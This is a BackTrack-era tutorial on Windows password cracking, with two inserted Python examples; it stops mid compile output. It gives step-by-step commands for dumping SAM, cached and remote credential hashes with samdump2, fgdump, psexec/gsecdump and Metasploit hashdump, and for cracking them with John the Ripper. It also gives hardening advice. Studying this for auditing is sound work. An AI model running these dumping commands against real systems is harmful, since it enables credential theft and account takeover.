- How to crack passwords !
- Cracking Passwords Version 1.1
- This document is for people who want to learn the how and why of password cracking. There is
- a lot of information being presented and you should READ IT ALL BEFORE you attempt
- doing anything documented here. I do my best to provide step by step instructions along with the
- reasons for doing it this way. Other times I will point to a particular website where you can find the
- information. In those cases someone else has done what I am attempting and did a good or great job
- and I did not want to steal their hard work. These instructions have several excerpts from a
- combination of posts from pureh@te, granger53, irongeek, PrairieFire, RaginRob, stasik, and
- Solar Designer. I would also like to thank each of them and others for the help they have provided
- me on the BackTrack forum.
- I will cover both getting the SAM from inside Windows and from the BackTrack CD, DVD, or
- USB flash drive. The SAM is the Security Accounts Manager database where local usernames and
- passwords are stored. For legal purposes I am using my own system for this article. The first step
- is to get a copy of pwdump. You can choose one from http://en.wikipedia.org/wiki/Pwdump.
- Update: I used to use pwdump7 to dump my passwords; however, I have come across a new utility
- called fgdump from http://www.foofus.net/fizzgig/fgdump/. This new utility will dump passwords
- from clients and Active Directory (Windows 2000 and 2003 for sure, not sure about Windows
- 2008), where pwdump7 only dumps client passwords. I have included a sample hash.txt that has
- simple passwords and should be cracked very easily. NOTE: Some anti-virus software packages
- flag pwdump* and fgdump as trojan horse programs or some other unwanted program. If
- necessary, you can add an exclusion for fgdump and/or pwdump to your anti-virus package so it
- won't flag them. However, it is better for the community if you contact your anti-virus vendor and
- ask them not to flag the tool as a virus/malware/trojan horse.
- You can find the latest version of this document at http://www.backtrack-linux.org/
- Contents
- 1 LM vs. NTLM
- 2 Syskey
- 3 Cracking Windows Passwords
- 3.1 Extracting the hashes from the Windows SAM
- 3.1.1 Using BackTrack Tools
- 3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
- 3.1.1.2 Using samdump2 v2.0.1 (BT4)
- 3.1.1.3 Cached Credentials
- 3.1.2 Using Windows Tools
- 3.1.2.1 Using fgdump
- 3.1.2.2 Using gsecdump
- Cracking Passwords Version 1.1 file:///D:/password10.html
- 1 of 45 2/15/2010 3:48 PM
- 3.1.2.3 Using pwdump7
- 3.1.2.4 Cached Credentials
- 3.2 Extracting the hashes from the Windows SAM remotely
- 3.2.1 Using BackTrack Tools
- 3.2.1.1 ettercap
- 3.2.2 Using Windows Tools
- 3.2.2.1 Using fgdump
- 3.3 Cracking Windows Passwords
- 3.3.1 Using BackTrack Tools
- 3.3.1.1 John the Ripper BT3 and BT4
- 3.3.1.1.1 Cracking the LM hash
- 3.3.1.1.2 Cracking the NTLM hash
- 3.3.1.1.3 Cracking the NTLM using the cracked LM hash
- 3.3.1.1.4 Cracking cached credentials
- 3.3.1.2 John the Ripper - current
- 3.3.1.2.1 Get and Compile
- 3.3.1.2.2 Cracking the LM hash
- 3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
- 3.3.1.2.4 Cracking the NTLM hash
- 3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
- 3.3.1.2.6 Cracking cached credentials
- 3.3.1.3 Using MDCrack
- 3.3.1.3.1 Cracking the LM hash
- 3.3.1.3.2 Cracking the NTLM hash
- 3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.1.4 Using Ophcrack
- 3.3.1.4.1 Cracking the LM hash
- 3.3.1.4.2 Cracking the NTLM hash
- 3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2 Using Windows Tools
- 3.3.2.1 John the Ripper
- 3.3.2.1.1 Cracking the LM hash
- 3.3.2.1.2 Cracking the NTLM hash
- 3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2.1.4 Cracking cached credentials
- 3.3.2.2 Using MDCrack
- 3.3.2.2.1 Cracking the LM hash
- 3.3.2.2.2 Cracking the NTLM hash
- 3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2.3 Using Ophcrack
- 3.3.2.3.1 Cracking the LM hash
- 3.3.2.3.2 Cracking the NTLM hash
- 3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
- 3.3.2.4 Using Cain and Abel
- 3.3.3 Using a Live CD
- 3.3.3.1 Ophcrack
- 4. Changing Windows Passwords
- 4.1 Changing Local User Passwords
- 4.1.1 Using BackTrack Tools
- 4.1.1.1 chntpw
- 4.1.2 Using a Live CD
- 4.1.2.1 chntpw
- 4.1.2.2 System Rescue CD
- 4.2 Changing Active Directory Passwords
- 5 plain-text.info
- 6 Cracking Novell NetWare Passwords
- 7 Cracking Linux/Unix Passwords
- 8 Cracking networking equipment passwords
- 8.1 Using BackTrack tools
- 8.1.1 Using Hydra
- 8.1.2 Using Xhydra
- 8.1.3 Using Medusa
- 8.1.4 Using John the Ripper to crack a Cisco hash
- 8.2 Using Windows tools
- 8.2.1 Using Brutus
- 9 Cracking Applications
- 9.1 Cracking Oracle 11g (sha1)
- 9.2 Cracking Oracle passwords over the wire
- 9.3 Cracking Office passwords
- 9.4 Cracking tar passwords
- 9.5 Cracking zip passwords
- 9.6 Cracking pdf passwords
- 10 Wordlists aka Dictionary attack
- 10.1 Using John the Ripper to generate a wordlist
- 10.2 Configuring John the Ripper to use a wordlist
- 10.3 Using crunch to generate a wordlist
- 10.4 Generate a wordlist from a textfile or website
- 10.5 Using premade wordlists
- 10.6 Other wordlist generators
- 10.7 Manipulating your wordlist
- 11 Rainbow Tables
- 11.1 What are they?
- 11.2 Generating your own
- 11.2.1 rcrack - obsolete but works
- 11.2.2 rcracki
- 11.2.3 rcracki - boinc client
- 11.2.4 Generating a rainbow table
- 11.3 WEP cracking
- 11.4 WPA-PSK
- 11.4.1 airolib
- 11.4.2 pyrit
- 12 Distributed Password cracking
- 12.1 john
- 12.2 medussa (not a typo this is not medusa)
- 13 using a GPU
- 13.1 cuda - nvidia
- 13.2 stream - ati
- 14 example hash.txt
- 1 LM vs. NTLM
- The LM hash is the old style hash used in MS operating systems before NT 3.1. It converts the password to
- uppercase, then null-pads or truncates the password to 14 characters. The password is split into two 7 character
- halves and each half is hashed with the DES algorithm. NT 3.1 to XP SP2 supports LM hashes for backward
- compatibility and they are enabled by default. Vista supports LM hashes but they are disabled by default. Given
- the weaknesses in the LM hash it is recommended to disable LM hashes on all MS operating systems using the
- steps in http://support.microsoft.com/kb/299656
- NTLM was introduced in NT 3.1 and does not convert the password to uppercase, does not break the password
- apart, and supports password lengths greater than 14. There are two versions of NTLM, v1 and v2. Due to a
- weakness in NTLM v1 it should not be used. Microsoft has included support for NTLM v2 for all of its
- operating systems either via service pack or the Directory Services client (for Windows 9X). You enable
- NTLM v2 by following the instructions at http://support.microsoft.com/kb/239869. For maximum security
- you should set LMCompatibility to 3 for Windows 9X and LMCompatibilityLevel to 5 for NT, 2000, XP,
- and 2003. Of course you should test these changes BEFORE you put them into a production environment.
- If LM hashes are disabled on your system the output of pwdump and/or the 127.0.0.1.pwdump text file will
- look like:
- Administrator:500:NO PASSWORD*********************:00AB1D1285F410C30A83B435F2CA798D:::
- Guest:501:NO PASSWORD*********************:31A6CAE0D36AD931B76C59D7E1C039C0:::
- HelpAssistant:1000:NO PASSWORD*********************:BF23C2595478A6279F7CB53EF76E601F:::
- SUPPORT_3845a0:1002:NO PASSWORD*********************:0C8D62E10A6240BACD910C8AB295BB79:::
- ASPNET:1005:9F07AE96CA4310752BDC083AAC960496:A99C1C3DB39E3C732EF5C2F63579AF96:::
- The first field is the username. The second field is the last four numbers of the SID for that username. The
- SID is a security identifier that is unique to each username. The third field is the LM hash. The fourth field is
- the NTLM hash.
- If you do not have an ASPNET user account do not worry about it. If you do have an ASPNET user account do
- NOT change the password as I am told that will break something. What I did was delete the account and then
- recreate it using: %systemroot%\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe /i
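As an added example (not part of the original document and not code from the pwdump or fgdump tools), here is a small Python parser for the hash.txt format just described, written from the auditing side: it reports which accounts still carry an LM hash and which LM hashes show that the password is 7 characters or fewer. The NO PASSWORD marker and the five sample records are taken from the dump above (the SUPPORT_ line rejoined where the document wraps it); the `svc` record used in the test is constructed. The constant `EMPTY_LM_HALF` is the well-known LM half-hash of seven null bytes, which is what the second half of the LM hash equals for any password shorter than 8 characters.

```python
"""Parse pwdump/fgdump style 'user:rid:lmhash:nthash:::' records and audit them.

Added example for illustration; not code from the original document or from
the pwdump/fgdump tools. Two findings are reported: accounts that still store
an LM hash (the document recommends disabling LM storage) and accounts whose
LM hash reveals a password of 7 characters or fewer.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# LM hashes each half of the uppercased, null-padded 14-character password with
# DES. For a password of 7 characters or fewer the second half is the hash of
# seven null bytes, which is this fixed, well-known value.
EMPTY_LM_HALF = "AAD3B435B51404EE"
HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")


@dataclass
class Account:
    username: str
    rid: int
    lm_hash: Optional[str]  # None when no LM hash is stored for the account
    nt_hash: str

    @property
    def lm_present(self) -> bool:
        return self.lm_hash is not None

    @property
    def short_password(self) -> bool:
        """True when the LM hash shows the password is at most 7 characters."""
        return self.lm_present and self.lm_hash[16:] == EMPTY_LM_HALF


def parse_pwdump_line(line: str) -> Optional[Account]:
    """Parse one record. Returns None for a blank line and raises ValueError
    for a line that does not follow the user:rid:lm:nt::: layout."""
    line = line.strip()
    if not line:
        return None
    fields = line.split(":")
    if len(fields) < 4:
        raise ValueError(f"not a pwdump record: {line!r}")
    username, rid, lm, nt = fields[0], fields[1], fields[2], fields[3]
    if not rid.isdigit():
        raise ValueError(f"bad RID for {username!r}: {rid!r}")
    if not HEX32.match(nt):
        raise ValueError(f"bad NT hash for {username!r}: {nt!r}")
    # pwdump-style tools print a 'NO PASSWORD***...' marker in the LM field
    # when no LM hash is stored for the account.
    lm_hash = lm.upper() if HEX32.match(lm) else None
    if lm_hash is None and not lm.startswith("NO PASSWORD"):
        raise ValueError(f"unrecognised LM field for {username!r}: {lm!r}")
    return Account(username, int(rid), lm_hash, nt.upper())


def parse_pwdump(text: str) -> List[Account]:
    accounts = []
    for line in text.splitlines():
        acct = parse_pwdump_line(line)
        if acct is not None:
            accounts.append(acct)
    return accounts


def accounts_with_lm(accounts: List[Account]) -> List[str]:
    """Usernames that still have an LM hash stored."""
    return [a.username for a in accounts if a.lm_present]


def accounts_with_short_password(accounts: List[Account]) -> List[str]:
    """Usernames whose LM hash shows a password of 7 characters or fewer."""
    return [a.username for a in accounts if a.short_password]


# Sample records from the dump shown in the document.
SAMPLE_DUMP = """\
Administrator:500:NO PASSWORD*********************:00AB1D1285F410C30A83B435F2CA798D:::
Guest:501:NO PASSWORD*********************:31A6CAE0D36AD931B76C59D7E1C039C0:::
HelpAssistant:1000:NO PASSWORD*********************:BF23C2595478A6279F7CB53EF76E601F:::
SUPPORT_3845a0:1002:NO PASSWORD*********************:0C8D62E10A6240BACD910C8AB295BB79:::
ASPNET:1005:9F07AE96CA4310752BDC083AAC960496:A99C1C3DB39E3C732EF5C2F63579AF96:::
"""

if __name__ == "__main__":
    accts = parse_pwdump(SAMPLE_DUMP)
    print("accounts still storing an LM hash:", accounts_with_lm(accts))
    print("accounts whose LM hash reveals a password of <= 7 chars:",
          accounts_with_short_password(accts))
```

Run against the sample, only ASPNET is reported as still storing an LM hash, which matches what the dump above shows by eye; on a real dump the same two lists are the accounts to chase before rather than after someone else cracks them.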
- 2 Syskey
- To make it more difficult to crack your passwords, use syskey. For more information on syskey see
- http://support.microsoft.com/kb/310105. The short version is that syskey encrypts the SAM. The weakest but
- most convenient option is to store a system generated password locally; locally means in the registry. The upside is
- that the SAM gets encrypted and you can reboot the server remotely without extra equipment. The next option is
- password startup. This is slightly more difficult to get around, but if you remotely reboot the server, it will
- stop and wait for someone to enter the password. You will need a KVM over IP or a serial port concentrator
- so you can enter the password remotely. The most secure option is the system generated password stored on a
- floppy disk. The downsides to this option are that floppy disks fail, you misplace the floppy disk, newer equipment
- does not have a floppy disk drive, there are no remote reboots, and you will probably leave the floppy in the drive so
- you can remote reboot, which defeats the security. I use a system generated password stored locally; weak, but
- better than not doing it. To disable syskey use chntpw and follow its instructions.
- 3 Cracking Windows Passwords
- 3.1 Extracting the hashes from the Windows SAM
- 3.1.1 Using BackTrack Tools
- 3.1.1.1 Using bkhive and samdump2 v1.1.1 (BT2 and BT3)
- 1. Mount your Windows partition, substituting hda1 for whatever your Windows partition is:
- # mount /dev/hda1 /mnt/XXX
- 2. If the syskey password is stored locally you need to extract it from the registry so you can decrypt the
- SAM. If syskey is set up to prompt for a password or the password is on a floppy, stop now and read the
- syskey documentation in this document for more information about syskey. If you installed Windows to
- something other than C:\WINDOWS please substitute the correct path. WARNING: the path is case
- sensitive. The filenames of sam, security, and system are case sensitive. On my system these files are
- lowercase. I have come across other XP systems where they are uppercase. On the Vista system I have
- used the filenames are uppercase.
- BackTrack 2 users use the following:
- # bkhive-linux /mnt/XXX/WINDOWS/system32/config/system syskey.txt
- BackTrack 3 users use the following:
- # bkhive /mnt/XXX/WINDOWS/system32/config/system syskey.txt
- 3. Dump the hashes:
- # samdump2 /mnt/XXX/WINDOWS/system32/config/sam syskey.txt >hash.txt
- samdump2 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt.
- You can also run samdump2 with the -o parameter to write the output to a file:
- # samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/sam syskey.txt
- 3.1.1.2 Using new samdump2 v2.0 (BT4)
- The current version is 2.0.1 and has the benefit of being able to extract the syskey on its own. This means
- dumping the hashes is now a 1 step process instead of two. To upgrade and run samdump2 v2.0.1:
- 1. Download the current samdump2 from http://sourceforge.net/project/showfiles.php?group_id=133599
- 2. # tar -xjvf samdump2-2.0.1.tar.bz2
- 3. # cd samdump2-2.0.1
- 4. # make
- 5. # cp samdump2 /usr/local/bin/samdump20
- This will keep the existing version. If you want to overwrite the existing version do:
- # cp samdump2 /usr/local/bin/
- 6. Mount your Windows partition, substituting hda1 for whatever your Windows partition is:
- # mount /dev/hda1 /mnt/XXX
- 7. If the syskey password is stored locally samdump2 v2.0 will extract it from the registry so it can decrypt
- the SAM. If syskey is set up to prompt for a password or the password is on a floppy, stop now and read
- the syskey documentation in this document for more information about syskey. If you installed
- Windows to something other than C:\WINDOWS please substitute the correct path. WARNING: the path is
- case sensitive. The filenames of sam, security, and system are case sensitive. On my system these files
- are lowercase. I have come across other XP systems where they are uppercase. On the Vista system I
- have used the filenames are uppercase.
- 8. Dump the hashes:
- # samdump2 /mnt/XXX/WINDOWS/system32/config/system /mnt/XXX/WINDOWS/system32/config/sam >hash.txt
- samdump2 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt.
- You can also run samdump2 with the -o parameter to write the output to a file. With v2.0 the arguments are
- the system hive and the sam hive, as in the command above, not the syskey.txt file used by v1.1.1:
- # samdump2 -o hash.txt /mnt/XXX/WINDOWS/system32/config/system /mnt/XXX/WINDOWS/system32/config/sam
- 3.1.1.3 Cached Credentials
- The only Linux based application to dump cached credentials I found is creddump, which can be found at
- http://code.google.com/p/creddump/. samdump2 v2.0.1 couldn't do this so I wrote the code to dump cached
- credentials. I have submitted it upstream so I hope to see this feature in the next version.
- 3.1.2 Using Windows Tools
- 3.1.2.1 Using fgdump
- To dump local passwords:
- 1. Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this is my
- system I know the administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 2. Download one of the fgdump files from http://swamp.foofus.net/fizzgig/fgdump/downloads.htm and
- unzip it.
- 3. Run the fgdump utility you downloaded:
- C:\> fgdump -v
- 4. Copy the 127.0.0.1.pwdump file to a floppy or USB thumb drive if you are going to use BackTrack to
- crack the hashes.
- You can dump passwords from remote systems but only if you know the remote local administrator password
- or have domain administrator privileges.
- 1. Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this is my
- system I know the administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 2. Download one of the fgdump files from http://swamp.foofus.net/fizzgig/fgdump/downloads.htm and
- unzip it.
- 3. Run the fgdump utility you downloaded:
- C:\> fgdump -v -h hostname -u Username -p Password
- where hostname is the name or IP of the remote system you want to retrieve the passwords from,
- Username is the username of the account to connect to the remote system with (usually Administrator
- or Domain\Administrator or an account with Domain Administrator privileges), and
- Password is the password of the above account.
- NOTE: If you have a firewall installed on the remote system this will not work.
- 4. Copy the 127.0.0.1.pwdump file to a floppy or USB thumb drive if you are going to use BackTrack to
- crack the hashes.
- 3.1.2.2 Using gsecdump
- Thanks to williamc for pointing out another password dumping tool. These instructions are based on the
- Exploitation part of his Intranet Exploitation tutorial.
- 1. Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this is my
- system I know the administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 2. Download the gsecdump file from http://www.truesec.com/PublicStore/catalog/categoryinfo.aspx?cid=223.
- You have to click on the Hamta filen link to download it. Once downloaded, unzip it.
- 3. Download the psexec tool from http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx and
- unzip it.
- 4. Run as follows:
- C:\> psexec \\hostname -u username -p password -s -f -c gsecdump.exe -s > hash.txt
- hostname is the name of the PC where you want psexec to run, AKA the target.
- username is the username to login to the remote PC.
- password is the password of the above username. If you don't put it in here you will be prompted to enter it.
- If you are prompted the password won't be displayed.
- -s (the first one) tells psexec to run the process as the system account
- -f copies the program to the target PC even if it already exists there
- -c copies the program to the target PC
- gsecdump.exe is the utility you want to run
- -s (the second one) tells gsecdump to dump the SAM/AD hashes
- the > character redirects the output to a file called hash.txt
- NOTE: If you have a firewall installed on the remote system this will not work.
- 5. Copy the hash.txt file to a floppy or USB thumb drive if you are going to use BackTrack to crack the
- hashes.
- 3.1.2.3 Using pwdump
- 1. Download one of the pwdump files from http://en.wikipedia.org/wiki/Pwdump and unzip it.
- 2. Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this is my
- system I know the administrator password. You could also try to use metasploit to attack your system to
- get to a command prompt.
- 3. Run the pwdump utility you downloaded:
- C:\> pwdump7 >c:\hash.txt
- pwdump7 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt.
- 4. Copy the hash.txt file to a floppy or USB thumb drive if you are going to use BackTrack to crack the
- hashes.
- 3.1.2.4 Cached Credentials
- When a user logs into a domain their password is cached in the registry so that in the event that the Domain
- Controller or network goes down the user can still login to their PC. To export these registry keys you need a
- tool called cachedump. It can be downloaded from ftp://ftp.openwall.com/john/contrib/cachedump/
- The readme.txt in the zip contains everything you want to know about where the cached credentials are
- stored, how cached credentials work, how they are hashed, and how the tool works. Cachedump does not
- work on Windows Vista. Vista changed the way that cached credentials work.
- You can also download the fgdump with source file from http://www.foofus.net/fizzgig/fgdump/ and get
- cachedump and its source code.
- To use:
- 1. Extract cachedump.exe from the zip
- 2. Login to the PC as an administrator
- 3. Go to a cmd prompt (Start, Run, cmd)
- 4. C:\> cd \path to cachedump.exe
- 5. C:\> cachedump.exe -v
- This runs cachedump.exe in verbose mode. I suggest running cachedump in verbose mode the first time you
- use it so you know what is going on and can identify any problems. Once you have good information
- displayed on the screen you can use:
- C:\> cachedump.exe >cache.txt
- and this will redirect the output from the screen to a file called cache.txt
- Now you can use John The Ripper or Cain and Abel to crack the hashes. Please note that Cached Credentials
- use a different hash than LM or NTLM. The lowercase username is salted with the password.
- The best way to protect yourself from this is to disable cached credentials. Change the value of the following
- registry key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\CACHEDLOGONSCOUNT
- to 0. You can do this manually or with Group Policy.
- 3.2 Extracting Windows Password hashes remotely
- 3.2.1 Using BackTrack Tools
- 3.2.1.1 Using ettercap
- You can use ettercap and man in the middle attacks to sniff the username and password of a user over the
- network. DO NOT ATTEMPT THIS WITHOUT PERMISSION OF THE USER WHOSE ACCOUNT YOU
- WANT TO SNIFF.
- You can read an ettercap tutorial at http://openmaniak.com/ettercap.php which covers the basics of how to
- use ettercap. There is so much that ettercap can do, and there are so many tutorials covering how to use it, that
- I am not going to duplicate the effort. Just do a quick search using your favorite internet search engine for
- ettercap tutorials and read.
- 3.2.1.2 Using hashdump (metasploit)
- I am not going to cover this in great detail. To use hashdump you first have to use metasploit to compromise
- the PC from which you want the password hashes. There are already a number of tutorials that explain how
- to use metasploit. The best documentation is at http://www.metasploit.com/framework/support/. Once you
- have compromised the PC using metasploit you can extract the hashes by doing:
- use priv
- hashdump
- 3.2.2 Using Windows Tools
- 3.2.2.1 Using fgdump
- 1. Download one of the fgdump files from http://swamp.foofus.net/fizzgig/fgdump/downloads.htm and
- unzip it.
- 2. Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this is my
- system I know the administrator password. You will need the administrator password or the username and
- password of an account that is in the local Administrators group on the PC from which you want the
- hashes.
- 3. Run the fgdump utility you downloaded:
- C:\> fgdump -v -h hostname or IP_Address_of_Target -u username -p password
- where username and password are an account with administrator privileges.
- 4. Copy the 127.0.0.1.pwdump file to a floppy or USB thumb drive if you are going to use BackTrack to crack
- the hashes.
- 3.2.2.2 Using pwdump6
- 1. Download pwdump6 from http://en.wikipedia.org/wiki/Pwdump and unzip it.
- 2. Login to the system as an administrator and get to a command prompt (Start, Run, cmd). Since this is my
- system I know the administrator password. You will need the administrator password or the username and
- password of an account that is in the local Administrators group on the PC from which you want the
- hashes.
- 3. Run the utility you downloaded:
- C:\> pwdump6 -u username -p password hostname or IP_Address_of_Target >c:\hash.txt
- where username and password are an account with administrator privileges.
- pwdump6 will dump the SAM to the screen and the > character redirects the output to a file called
- hash.txt.
- 4. Copy the hash.txt file to a floppy or USB thumb drive if you are going to use BackTrack to crack the
- hashes.
- 3.3 Cracking Windows Passwords
- 3.3.1 Using BackTrack Tools
- My strategy for cracking Windows passwords is as follows:
- 1. Get/Develop a really good wordlist/dictionary
- 2. Find the password policy that is enforced for the account you are trying to crack
- 3. Crack the LM hash using John the Ripper
- 4. Crack the NTLM hash with the results of the cracked LM hash and the password policy information
- using mdcrack
- If there is no LM hash to crack I proceed to cracking with John the Ripper using the password policy
- information and my wordlist. Then I use rainbow tables if the tables match the password policy. http://plain-text.info
- is back up and running so I check if they have the cracked password already. To successfully use a
- rainbow table you need to know the password policy. There is no sense downloading a rainbow table that contains
- letters and numbers when the password policy requires a symbol (!@#$%^&* etc).
- 3.3.1.1 John the Ripper BT3 and BT4
- Version 1.7.2 shipped with BackTrack 3. Version 1.7.3.1 with jumbo patch 5 shipped with BT4. The John the
- Ripper that ships with BT4 requires at least a P4 with SSE2 instructions. If you don't have a processor that
- supports SSE2 then you have to download and compile john yourself. See the next section for instructions on
- how to do this.
- 3.3.1.1.1 Cracking the LM hash
- john only needs to know the path to the hash.txt to begin bruteforcing and return the uppercase password
- # /usr/local/john/john hash.txt
- 3.3.1.1.2 Cracking the NTLM hash
- john only needs to know the path to the hash.txt to begin bruteforcing and return the password
- # /usr/local/john/john --format:NT hash.txt
- will begin to bruteforce the NTLM hashes
- 3.3.1.1.3 Cracking the NTLM hash using the cracked LM hash
- Stasik told me it is much easier to crack the NTLM hash if you know the character set. This way you do not
- need to bruteforce all possible character combinations. Once you have TESTTEST, feed a custom character
- set of tesTES to john and it will return the proper case password much faster than if you did not limit the
- character set. The issue is that john has no easy way to limit the character set. You will have to modify the
- john.conf file and include the following code that Solar Designer has kindly published to the john-users mailing
- list:
- [List.External:customcharset]
- int running; // Are we already running?
- int last; // Last character position, zero-based
- int c0, c[0x100]; // Cyclic charset
- void init()
- {
-     int length, cm, i;
-     length = 10; // password length: set it to the length of the cracked LM password (8 for TESTTEST)
-     c[c0 = 't'] = 'e'; // change the t and the e to the first and second letters of the custom character set
-     c['e'] = 's'; // change the e and the s to the second and third letters of the character set
-     c['s'] = 'T'; // change the s and T to the third and fourth letters
-     c['T'] = 'E'; // etc
-     c['E'] = 'S'; // etc
-     c[cm = 'S'] = c0; // change the S to the last letter of the character set; it wraps back to the first (c0)
-     // If you cannot see the pattern then do not bother with this trick.
-     // If you can, make the necessary changes to suit your environment.
-     running = 0;
-     last = length - 1;
-     i = 0;
-     while (i < length) word[i++] = cm; word[i] = 0; // start with every position on the last letter
- }
- void generate()
- {
-     int i;
-     i = last;
-     while ((word[i] = c[word[i]]) == c0) // advance the last position; a wrap to c0 carries to the left
-         if (!i--) {
-             if (running++) word = 0; // first full wrap yields the initial word, the second means we are done
-             return;
-         }
- }
- Once you make the necessary changes begin cracking using:
- # /usr/local/john/john -external=customcharset --format:NT hash.txt
- Some notes from Solar Designer:
- 1. Being an external mode, this is not the fastest way to generate candidate passwords, although its
- performance is acceptable. Some further optimizations are possible (e.g., cache the last character
- outside of the word[] array). Also, be careful when you edit it (such as for a different charset) - errors
- in the way the cyclic charset is defined may result in the "while" loop in generate() becoming endless.
- 2. In order to actually crack an NTLM hash with this, you need a build of JtR with support for NTLM
- hashes. You may do a custom build with the latest jumbo patch (john-1.7.2-all-9.diff.gz), which means
- that you will need to install Cygwin on your Windows system, or you can download such a build made
- by someone else (one is linked from the JtR homepage - it is for an older version of the patch, though,
- so it is many times slower at NTLM hashes).
- 3. On a modern system, with a recent jumbo patch, and with the proper "make" target for your system,
- this should complete its work against an NTLM hash (or against many such hashes) in just a few
- minutes.
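To make the cyclic-charset trick concrete, and to add the check that Solar Designer's first note asks for, here is the same odometer generator reimplemented in Python. This is an added example, not code from the original document or from John the Ripper. `generate()` walks the candidates in the same order as the external mode above (last position cycles fastest, a wrap from the last letter back to `c0` carries leftwards); `validate_cycle()` refuses a successor map that does not form a single cycle through `c0`, which is exactly the condition under which the external mode's `while` loop would never terminate. `candidate_count()` makes the cost visible: for the tesTES charset over 8 positions it is 6^8 = 1,679,616 candidates, which is why a cracked LM password makes recovering the case of the NT-hash password cheap, and why the document recommends disabling LM hash storage.

```python
"""Python reimplementation of the cyclic-charset candidate generator expressed
above in John the Ripper's external-mode language.

Added example for illustration; not code from the original document or from
John the Ripper. It adds the check the accompanying note calls for: the
successor map must be one cycle through c0, or generate() would loop forever.
"""
from typing import Dict, Iterator, List


def build_cycle(charset: str) -> Dict[str, str]:
    """Build the successor map c[] that init() fills in by hand: each character
    maps to the next one in the charset and the last wraps to the first (c0)."""
    if not charset:
        raise ValueError("charset must not be empty")
    if len(set(charset)) != len(charset):
        raise ValueError("charset contains a repeated character")
    return {ch: charset[(i + 1) % len(charset)] for i, ch in enumerate(charset)}


def validate_cycle(succ: Dict[str, str], c0: str) -> None:
    """Walk the successor map from c0. It must return to c0 after visiting
    every key exactly once; a missing successor or a sub-cycle that never
    reaches c0 would make the external mode's while loop endless."""
    seen = set()
    ch = c0
    while True:
        if ch in seen:
            raise ValueError(f"mapping does not form a single cycle through {c0!r}")
        seen.add(ch)
        if ch not in succ:
            raise ValueError(f"no successor defined for {ch!r}")
        ch = succ[ch]
        if ch == c0:
            break
    if seen != set(succ):
        raise ValueError("some characters are unreachable from c0")


def generate(charset: str, length: int) -> Iterator[str]:
    """Yield every word of `length` characters over `charset`, in the same
    odometer order as the external mode's generate()."""
    succ = build_cycle(charset)
    c0, cm = charset[0], charset[-1]
    validate_cycle(succ, c0)
    # init(): fill the word with the last letter so the first call rolls every
    # position over to c0 and yields the first word.
    word: List[str] = [cm] * length
    running = False
    while True:
        i = length - 1
        while True:
            word[i] = succ[word[i]]
            if word[i] != c0:
                break            # no wrap at this position: word is ready
            if i == 0:
                # Every position wrapped. The first time this is the initial
                # word; the second time the space is exhausted.
                if running:
                    return
                running = True
                break
            i -= 1               # carry into the position to the left
        yield "".join(word)


def candidate_count(charset: str, length: int) -> int:
    """Size of the search space the external mode will walk."""
    return len(charset) ** length


if __name__ == "__main__":
    print("first candidates:", list(generate("tesTES", 8))[:5])
    print("candidates for tesTES over 8 positions:", candidate_count("tesTES", 8))
```

Because `validate_cycle()` runs before the first candidate is produced, a mis-edited mapping (for example two characters that point at each other while `c0` points elsewhere) fails immediately with a clear error instead of spinning, which is the failure mode the note above warns about.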
- 3.3.1.1.4 Cracking cached credentials
- john only needs to know the path to the hash.txt to begin bruteforcing and return the password
- # /usr/local/john/john --format:mscash hash.txt
- 3.3.1.2 John the Ripper - current
- The current version of John the Ripper doesn't ship with BT4. It adds some new features (dumbforce and
- knownforce) and speeds up several algorithms. However given the way BT4 handles updates I don't
- recommend updating the package yourself unless your processor doesn't support SSE2 instructions (i.e.
- something less than a P4). I recommend going to http://www.backtrack-linux.org/forums/tool-requests/ and
- requesting they update the package to the latest version. Do NOT ask them to drop the SSE2 requirement.
- The SSE2 instructions provide real benefits to the cracking process. If you need to compile your own version
- here is how.
- 3.3.1.2.1 Get and Compile
- We first have to remove the existing package and then we can download and compile the program.
- 1. Open a terminal window
- 2. # dpkg -r john
- 3. # wget http://www.openwall.com/john/g/john-1.7.4.2.tar.bz2
- 4. Go to ftp://ftp.openwall.com/john/contrib/
- and look for something like john-1.7.4.2-jumbo-1.diff.gz
- This is version 1 of the jumbo patch for john 1.7.4.2. Download the latest version that is there.
- 5. # tar -xvf john-1.7.4.2.tar.bz2
- 6. # cd john-1.7.4.2
- 7. # zcat ../john-1.7.4.2-jumbo-1.diff.gz | patch -p1 -Z
- You should see a long list of "patching file XXX". If you see "X out of Y hunks ignored" it means that the
- patch did not apply correctly. You either downloaded the wrong version of john or the wrong jumbo patch.
- Start over and make sure the jumbo patch matches the version of john you downloaded.
- 8. # cd src
- 9. # make
- This will display the various systems you can compile john for. I have a P3 that supports MMX so I will
- use the command: make linux-x86-mmx. To see which options your CPU supports do a: cat
- /proc/cpuinfo and look at the flags. If you have a P4 you probably have SSE2 (check the cpuinfo flags);
- then you would use: make linux-x86-sse2.
- 10. # make linux-x86-mmx
- You should see the following when john is done compiling:
- gcc DES_fmt.o DES_std.o DES_bs.o BSDI_fmt.o MD5_fmt.o MD5_std.o MD5_apache_fmt.o
